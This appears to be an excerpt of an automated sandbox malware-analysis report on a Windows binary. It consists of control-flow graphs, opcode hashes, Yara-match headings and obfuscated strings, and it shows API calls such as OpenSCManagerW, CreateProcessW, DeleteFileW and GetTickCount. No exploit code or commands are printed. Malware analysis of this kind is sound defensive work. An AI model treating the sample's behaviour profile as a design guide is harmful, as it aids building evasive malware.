                                              • Opcode ID: e91d87f21478d9267f3d7a87072a4a154992cd1c4bb3047956e735b84ee97cc7
                                              • Instruction ID: 6e40aa05d1f9e727e34d4125f7ffea54e1c89bb64f2ebcebbc07266d88f53e75
                                              • Opcode Fuzzy Hash: e91d87f21478d9267f3d7a87072a4a154992cd1c4bb3047956e735b84ee97cc7
                                              • Instruction Fuzzy Hash: 6661D2B17043809BDB64AFB8D8956FB26D1DBD0340F308A2DB595D7351EE39CE058B92

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 407 b6f10-b6f17 408 b6f20-b6f25 407->408 409 b6f2b 408->409 410 b7022-b7027 408->410 413 b6f8a-b6f9d call b3270 409->413 414 b6f2d-b6f32 409->414 411 b7029 410->411 412 b7081-b7086 410->412 418 b702b-b7030 411->418 419 b7068-b707c call b6e70 411->419 416 b7088-b709c call b6e70 412->416 417 b70a1-b70a6 412->417 434 b6fba-b6fcd LoadLibraryW 413->434 435 b6f9f-b6fb5 call b3d10 call b3c70 413->435 420 b6f78-b6f7d 414->420 421 b6f34 414->421 416->408 417->408 428 b70ac-b70ae 417->428 429 b704f-b7063 call b6e70 418->429 430 b7032-b7037 418->430 419->408 420->417 424 b6f83-b6f88 420->424 422 b6f3a-b6f3f 421->422 423 b70af-b70ba 421->423 431 b6f62-b6f76 call b6e70 422->431 432 b6f41-b6f46 422->432 424->408 429->408 430->417 438 b7039-b704a call b6e70 430->438 431->408 432->417 440 b6f4c-b6f60 call b6e70 432->440 443 b6fea-b6ff5 434->443 444 b6fcf-b6fe5 call b3d10 call b3c70 434->444 435->434 438->408 440->408 455 b7012-b701d 443->455 456 b6ff7-b700d call b3d10 call b3c70 443->456 444->443 455->408 456->455
                                              APIs
                                              • LoadLibraryW.KERNELBASE(00000000,?,19922D31,000B65DB), ref: 000B6FBB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 64d9de9f3735db7344b66145426d5bcdbc194903de0ec94377cf8ee59e60cd29
                                              • Instruction ID: 7e1942e5e24a3d3ce339bdb08ec162d216b7021bb45faded832c9a474c74a5e6
                                              • Opcode Fuzzy Hash: 64d9de9f3735db7344b66145426d5bcdbc194903de0ec94377cf8ee59e60cd29
                                              • Instruction Fuzzy Hash: 0D31C42171810187DA747A68E8A17FE25E2DBD0384F34483BF405DB356ED3EDD415B82

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 b9680-b9698 1 b96a0-b96a5 0->1 2 b96ab 1->2 3 b9800-b9805 1->3 6 b97ac-b97b3 2->6 7 b96b1-b96b6 2->7 4 b980b 3->4 5 b98a3-b98a8 3->5 12 b9811-b9816 4->12 13 b9935-b993c 4->13 8 b98aa-b98b1 5->8 9 b991d-b9922 5->9 10 b97d0-b97df OpenSCManagerW 6->10 11 b97b5-b97cb call b3d10 call b3c70 6->11 14 b96bc 7->14 15 b9751-b9756 7->15 17 b98ce-b98d9 8->17 18 b98b3-b98c9 call b3d10 call b3c70 8->18 9->1 19 b9928-b9934 9->19 23 b97e1-b97f1 10->23 24 b97f6-b97fb 10->24 11->10 25 b9818-b981d 12->25 26 b9872-b9879 12->26 21 b9959-b9964 13->21 22 b993e-b9954 call b3d10 call b3c70 13->22 27 b96be-b96c3 14->27 28 b9700-b9707 14->28 15->9 16 b975c-b97a7 15->16 16->1 52 b98db-b98f1 call b3d10 call b3c70 17->52 53 b98f6-b9907 RtlAllocateHeap 17->53 18->17 48 b9968-b997e call b2e40 21->48 22->21 23->1 24->1 25->9 31 b9823-b982b 25->31 37 b987b-b9891 call b3d10 call b3c70 26->37 38 b9896-b989e 26->38 32 b96dc-b96fe 27->32 33 b96c5-b96ca 27->33 35 b9709-b971f call b3d10 call b3c70 28->35 36 b9724-b974c call b3b10 28->36 39 b984b-b985f 31->39 40 b982d-b9845 call b3d10 call b3c70 31->40 32->1 33->9 41 b96d0-b96da call b79f0 33->41 35->36 36->1 37->38 38->1 67 b9863-b986d 39->67 40->39 41->1 64 b9981-b998d 48->64 52->53 63 b9909-b9918 53->63 53->64 63->1 67->1
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 000B97D9
                                              • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 000B98FE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeapManagerOpen
                                              • String ID: WDuA$WDuA$j]1$j]1$p^v
                                              • API String ID: 963794170-3462980882
                                              • Opcode ID: a6a8c4d0217a0991b1c6046775ef8d2c962eab8f2ceb21bc2bc6c620a9faa9c1
                                              • Instruction ID: 722ea7d38f4081daa2317b1844130946b0335e2f3d49b9aae06ed58e86850c2d
                                              • Opcode Fuzzy Hash: a6a8c4d0217a0991b1c6046775ef8d2c962eab8f2ceb21bc2bc6c620a9faa9c1
                                              • Instruction Fuzzy Hash: 5E61D3307442018BEBA4DF68D8967EE37D0AB91B40F64052DF646EB3A1EE75CD05CB52

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 301 b2ea0-b2eb6 302 b2eba-b2ebf 301->302 303 b2ec0-b2ec5 302->303 304 b2ecb 303->304 305 b2f8c-b2f91 303->305 308 b2f79-b2f87 304->308 309 b2ed1-b2ed6 304->309 306 b2f93-b2f98 305->306 307 b2ff2-b3055 305->307 310 b2f9a-b2f9f 306->310 311 b2fdf-b2fed call b3b10 306->311 307->303 308->303 312 b2ed8-b2edd 309->312 313 b2f0f-b2f16 309->313 316 b2eea-b2eef 310->316 317 b2fa5-b2fad 310->317 311->302 318 b2edf-b2ee4 312->318 319 b2efe-b2f02 312->319 314 b2f18-b2f2e call b3d10 call b3c70 313->314 315 b2f33-b2f3e 313->315 314->315 337 b2f5b-b2f69 RtlAllocateHeap 315->337 338 b2f40-b2f56 call b3d10 call b3c70 315->338 316->303 328 b2ef1-b2efb 316->328 325 b2faf-b2fc7 call b3d10 call b3c70 317->325 326 b2fcd-b2fda 317->326 318->316 327 b305a-b3062 318->327 321 b2f08-b2f0d 319->321 322 b30a5-b30af 319->322 321->303 325->326 326->302 329 b3082-b30a2 327->329 330 b3064-b307c call b3d10 call b3c70 327->330 329->322 330->329 337->322 340 b2f6f-b2f74 337->340 338->337 340->302
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00000008,00000238), ref: 000B2F63
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: p^v
                                              • API String ID: 1279760036-2513449335
                                              • Opcode ID: 2fc5d60425b1034bb0a9ffecb89ad90d0d52156aa45eb974d862e739a4dfd30e
                                              • Instruction ID: d05faa2f281868a51bcb1fded6f16e1c25d818fc5666f08ac4f5dcdacdd089b8
                                              • Opcode Fuzzy Hash: 2fc5d60425b1034bb0a9ffecb89ad90d0d52156aa45eb974d862e739a4dfd30e
                                              • Instruction Fuzzy Hash: 1B41DF316043018B9B68EE69D4945EEB7E5EBD0350F304D2EE482DB351DB70DE468B92

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 352 b4990-b49a0 353 b49bd-b49da 352->353 354 b49a2-b49b8 call b3d10 call b3c70 352->354 359 b49dc-b49f2 call b3d10 call b3c70 353->359 360 b49f7-b4a15 CreateProcessW 353->360 354->353 359->360 361 b4a93-b4a9a 360->361 362 b4a17-b4a1d 360->362 365 b4a1f-b4a33 362->365 366 b4a34-b4a3b 362->366 368 b4a58-b4a65 366->368 369 b4a3d-b4a53 call b3d10 call b3c70 366->369 376 b4a82-b4a92 368->376 377 b4a67-b4a7d call b3d10 call b3c70 368->377 369->368 377->376
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 000B4A11
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: D
                                              • API String ID: 963392458-2746444292
                                              • Opcode ID: 75ccbf637d3a19260def141e32ed60aaec4e750bed8150fec5818b9f272009ad
                                              • Instruction ID: d4ef9e1b9709796aa8c5b1de43e31b50368f52a68ab6bc0201ca8969d9f4d947
                                              • Opcode Fuzzy Hash: 75ccbf637d3a19260def141e32ed60aaec4e750bed8150fec5818b9f272009ad
                                              • Instruction Fuzzy Hash: CA218B317046419BE714AFB8DC52BEB76D6ABC0740F204929B965DB2A2EE34DE058782

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 384 b40d0-b40db 385 b40f8-b4103 384->385 386 b40dd-b40f3 call b3d10 call b3c70 384->386 391 b4120-b4128 RtlAllocateHeap 385->391 392 b4105-b411b call b3d10 call b3c70 385->392 386->385 392->391
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 000B4124
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: p^v
                                              • API String ID: 1279760036-2513449335
                                              • Opcode ID: f628be2d5a445375b6df4afbe226801afbc393809ec9df44ce2ec32bec1e94f4
                                              • Instruction ID: ae578945a6c2465693f53dd92e04ebe4fb276006b13c670c24f09bcd0c2a4781
                                              • Opcode Fuzzy Hash: f628be2d5a445375b6df4afbe226801afbc393809ec9df44ce2ec32bec1e94f4
                                              • Instruction Fuzzy Hash: 8FE0653170025047EB50BBFCBC56AEB16D5DBD0B807204929B501E7252EE78CE010B91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 398 b5ad0-b5adc call b6340 401 b5af9-b5afd ExitProcess 398->401 402 b5ade-b5af4 call b3d10 call b3c70 398->402 402->401
                                              APIs
                                              • ExitProcess.KERNEL32(00000000), ref: 000B5AFB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 58a1c1be678f219789df775422b5ef5001a0f6362bf9ab22f7c386ee0c0fba7d
                                              • Instruction ID: 666402fc1b9c32ef0a04b8a013222b81873cd041015ddcb5f4727aa4881200e6
                                              • Opcode Fuzzy Hash: 58a1c1be678f219789df775422b5ef5001a0f6362bf9ab22f7c386ee0c0fba7d
                                              • Instruction Fuzzy Hash: 9BD0C920300201CAE6447BF8A8D27EA59828B80781F20891AA5419B296EEB48D409751

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 465 b3460-b347d call b3270 468 b349a-b34b2 465->468 469 b347f-b3495 call b3d10 call b3c70 465->469 474 b34cf-b34da 468->474 475 b34b4-b34ca call b3d10 call b3c70 468->475 469->468 481 b34dc-b34f2 call b3d10 call b3c70 474->481 482 b34f7-b3506 474->482 475->474 481->482 488 b3508-b351e call b3d10 call b3c70 482->488 489 b3523-b352f DeleteFileW 482->489 488->489
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 53bbb7875524327075e610b6db3a9ad3ac2405ecb7d63ecd811e2560968aba9a
                                              • Instruction ID: 7db923ec521a2ef7f92c2fcd815b3bbfa8d4f194aebaa9a2bffecf4dfa27d1ae
                                              • Opcode Fuzzy Hash: 53bbb7875524327075e610b6db3a9ad3ac2405ecb7d63ecd811e2560968aba9a
                                              • Instruction Fuzzy Hash: E911733070024187D754BBB9AC66BEB6AD6DBD0784B304A2DB915DB352FE3CCE058B91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 495 b6e70-b6e82 call b3270 498 b6e9f-b6eb3 LoadLibraryW 495->498 499 b6e84-b6e9a call b3d10 call b3c70 495->499 500 b6ed0-b6edb 498->500 501 b6eb5-b6ecb call b3d10 call b3c70 498->501 499->498 510 b6ef8-b6f00 500->510 511 b6edd-b6ef3 call b3d10 call b3c70 500->511 501->500 511->510
                                              APIs
                                              • LoadLibraryW.KERNELBASE(00000000,?,19922D31,000B7097,?,19922D31,000B65DB), ref: 000B6EA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 66da402b91805c0f2e3b683f870f3c0e7bf07d4669197ec8ca6ad0cf9000c5c9
                                              • Instruction ID: 2a1e26c71fa34af5ba40b3f03247e470ad4362f61172a21c62c61d0e686112a8
                                              • Opcode Fuzzy Hash: 66da402b91805c0f2e3b683f870f3c0e7bf07d4669197ec8ca6ad0cf9000c5c9
                                              • Instruction Fuzzy Hash: 0A014B307002908BA754BFB9A8917EB27D6DBD43807204929A425DB362FE38DE014B91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountTick
                                              • String ID: 8e5$8e5$8e5$z`$z`$8=J$_F$bJr9$bJr9$ma&
                                              • API String ID: 536389180-1922213847
                                              • Opcode ID: d6cfb2a505a57810e66642f52844d9b3ebcecf68c52702ce0ef1b7bc3770533a
                                              • Instruction ID: 403b10b4a72ac645efbbde62888c4d1a0fa06e04fcabdebec6a59b4c5f027b65
                                              • Opcode Fuzzy Hash: d6cfb2a505a57810e66642f52844d9b3ebcecf68c52702ce0ef1b7bc3770533a
                                              • Instruction Fuzzy Hash: CB32D2B16083018BD768DF68D4955EE76E1EB90744F24092EE582D7362DB3ACE48CBD3

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 934 b4e60-b4e77 935 b4e7c 934->935 936 b4e80-b4e86 935->936 937 b5038-b503e 936->937 938 b4e8c 936->938 939 b512a-b5130 937->939 940 b5044 937->940 941 b4e92-b4e98 938->941 942 b5140-b5147 938->942 945 b5027-b502d 939->945 946 b5136-b513b 939->946 943 b504a-b5050 940->943 944 b50e4-b50eb 940->944 949 b4f6b-b4f71 941->949 950 b4e9e 941->950 947 b5149-b515f call b3d10 call b3c70 942->947 948 b5164-b516f 942->948 953 b5078-b507f 943->953 954 b5052-b5058 943->954 958 b5108-b5125 944->958 959 b50ed-b5103 call b3d10 call b3c70 944->959 951 b5033 945->951 952 b5192-b5199 945->952 946->936 947->948 984 b518c-b518f 948->984 985 b5171-b5187 call b3d10 call b3c70 948->985 955 b4f73-b4f79 949->955 956 b4fb6-b4fbd 949->956 960 b4ea0-b4ea6 950->960 961 b4ed7-b4ede 950->961 951->935 969 b509c-b50a7 953->969 970 b5081-b5097 call b3d10 call b3c70 953->970 954->945 966 b505a-b5068 call b40d0 954->966 955->945 967 b4f7f-b4f86 955->967 962 b4fda-b5004 956->962 963 b4fbf-b4fd5 call b3d10 call b3c70 956->963 958->935 959->958 973 b4ea8-b4eae 960->973 974 b4ec2-b4ed5 960->974 964 b4efb-b4f1d 961->964 965 b4ee0-b4ef6 call b3d10 call b3c70 961->965 1005 b5021 962->1005 1006 b5006-b501c call b3d10 call b3c70 962->1006 963->962 1007 b4fac-b4fb1 964->1007 1008 b4f23-b4f2a 964->1008 965->964 966->952 1010 b506e-b5073 966->1010 980 b4f88-b4f9e call b3d10 call b3c70 967->980 981 b4fa3-b4fa6 967->981 1001 b50a9-b50bf call b3d10 call b3c70 969->1001 1002 b50c4-b50df 969->1002 970->969 973->945 986 b4eb4-b4ec0 call b4030 973->986 974->936 980->981 981->1007 984->952 985->984 986->935 1001->1002 1002->935 1005->945 1006->1005 1007->935 1018 b4f2c-b4f42 call b3d10 call b3c70 1008->1018 1019 b4f47-b4f66 1008->1019 1010->935 1018->1019 1019->936
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: GU-$GU-$WDuA$WDuA$WDuA$WDuA$WDuA$p^v
                                              • API String ID: 0-3451513389
                                              • Opcode ID: 99b47fb53acca1d21fdd5fb1f9620ad8b591ee5d62c6dcc2d4e82e08278f5c40
                                              • Instruction ID: d41a79821d48b94ab4a73c5c916d19da40322cdda7895997f767642c9edd69d5
                                              • Opcode Fuzzy Hash: 99b47fb53acca1d21fdd5fb1f9620ad8b591ee5d62c6dcc2d4e82e08278f5c40
                                              • Instruction Fuzzy Hash: C1711831B046119BDB64BFB8DC817EB36D6AB84340F250969F851EB292EB75DE004B82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: #X$WDuA$WDuA$WDuA$\L$zd
                                              • API String ID: 0-1901454614
                                              • Opcode ID: 8730e17ca4862135a39e50a2fa7619528730893be443fbbfdfc427fd35cff798
                                              • Instruction ID: b1d62f5700ca06fb0d4dc144f270e72507021e8a0d84844968c5388820030df4
                                              • Opcode Fuzzy Hash: 8730e17ca4862135a39e50a2fa7619528730893be443fbbfdfc427fd35cff798
                                              • Instruction Fuzzy Hash: 0491BF716083019BD798EF68D8995AFBBE1EBC4344F104A2DF49AD7250DB78CD048B92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: WDuA$WDuA$WDuA$WDuA
                                              • API String ID: 0-950830227
                                              • Opcode ID: 423999ac780cacb330ea7e54e91307e2f8210f746f5ebaf07120a22e370deb89
                                              • Instruction ID: 03d7bb4fcaea670d7d86db368daacb758daf830e5634d0e691008cbc38a30a7b
                                              • Opcode Fuzzy Hash: 423999ac780cacb330ea7e54e91307e2f8210f746f5ebaf07120a22e370deb89
                                              • Instruction Fuzzy Hash: F94126707042019BEF64ABA4D8917FE36C9E780314F68892AE946DB3A2EE34DD41C742
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C$E1$W
                                              • API String ID: 0-3013057810
                                              • Opcode ID: 382f4db0c6fffee24243230d49672a6b5c0222ae8939b7145abeba23048bc470
                                              • Instruction ID: cdc0775c2c586aee5ac21bf7ba167d3f714a2e7adb4e2a93278c09c850b3a74c
                                              • Opcode Fuzzy Hash: 382f4db0c6fffee24243230d49672a6b5c0222ae8939b7145abeba23048bc470
                                              • Instruction Fuzzy Hash: 664102B29083928BD758CF24D58546BBBE1FB90750F540E1EF4A15A250D3B4DA4DCBA3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C$E1$W
                                              • API String ID: 0-3013057810
                                              • Opcode ID: 7e7e774d2ddf906cf13ff0a1a6950789cd7c477ed5a5ce8b314ad04d32ac2694
                                              • Instruction ID: c0db41edc4ed20ccd63947d4ec2d5de42c3d90bb61a567906b6a603038889d50
                                              • Opcode Fuzzy Hash: 7e7e774d2ddf906cf13ff0a1a6950789cd7c477ed5a5ce8b314ad04d32ac2694
                                              • Instruction Fuzzy Hash: 8241E2B29083938BD768CF24D54916BB7E1BBD0714F004E1EF4A15A290D3B4DA4DCBA3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: E1$W$W
                                              • API String ID: 0-1447379309
                                              • Opcode ID: dcf952a1631fef7cd806af8a182772388f3a47c0f30ba73ecaa6f79687da2c60
                                              • Instruction ID: bb06c6ed1acd464d4d6c32700baa84095f9621d9ed741cc4f54c628b80ef15b3
                                              • Opcode Fuzzy Hash: dcf952a1631fef7cd806af8a182772388f3a47c0f30ba73ecaa6f79687da2c60
                                              • Instruction Fuzzy Hash: 2C31F572808352AFD3588F25C49805BFBF1BBD0764F51C91EF4A956260D3B8D949CF82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: E1$W$W
                                              • API String ID: 0-1447379309
                                              • Opcode ID: ee9d7b43610636101bf78b2e9dec18c5e67d0b706d14bbc9c721bc8caccc639c
                                              • Instruction ID: 42e560f059ddccd27c54882d20db8731ad1e76d22a1aba311489f69263455024
                                              • Opcode Fuzzy Hash: ee9d7b43610636101bf78b2e9dec18c5e67d0b706d14bbc9c721bc8caccc639c
                                              • Instruction Fuzzy Hash: 5331E371808392AFD759CF25C48815BFBE1ABC47A4F14C91EF8E95A260C3B89949CF53
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
